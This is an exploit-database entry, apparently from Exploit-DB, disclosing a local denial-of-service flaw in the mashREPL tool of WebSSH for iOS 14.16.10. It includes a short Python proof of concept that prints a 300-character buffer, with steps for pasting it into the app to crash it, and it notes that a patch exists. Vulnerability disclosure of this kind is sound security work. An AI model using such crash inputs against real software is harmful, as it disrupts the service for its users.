header-logo
Suggest Exploit
vendor:
WebSSH for iOS
by:
Luis Martinez
7.8
CVSS
HIGH
Denial of Service (DoS) Local
119
CWE
Product Name: WebSSH for iOS
Affected Version From: 14.16.10
Affected Version To: 14.16.10
Patch Exists: YES
Related CWE: N/A
CPE: a:apple:webssh_for_ios
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: iPhone 7 iOS 14.5.1
2021

WebSSH for iOS 14.16.10 – ‘mashREPL’ Denial of Service (PoC)

A buffer overflow vulnerability exists in WebSSH for iOS 14.16.10, which can be exploited by a malicious user to cause a denial of service. The vulnerability is caused due to a boundary error when handling user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted input to the vulnerable application. This will cause the application to crash, resulting in a denial of service condition.

Mitigation:

The vendor has released an update to address this vulnerability. Users should update to the latest version of the application.
Source

Exploit-DB raw data:

# Exploit Title: WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)
# Author: Luis Martinez
# Discovery Date: 2021-05-18
# Vendor Homepage: https://apps.apple.com/mx/app/webssh-ssh-client/id497714887
# Software Link: App Store for iOS devices
# Tested Version: 14.16.10
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 14.5.1

# Steps to Produce the Crash:
# 1.- Run python code: WebSSH_for_iOS_14.16.10.py
# 2.- Copy content to clipboard
# 3.- Open "WebSSH for iOS"
# 4.- Click -> Tools
# 5.- Click -> mashREPL
# 6.- Paste ClipBoard on "mashREPL>"
# 7.- Intro
# 8.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 300
print (buffer)

Navigation

Suggest Exploit

Services By CQR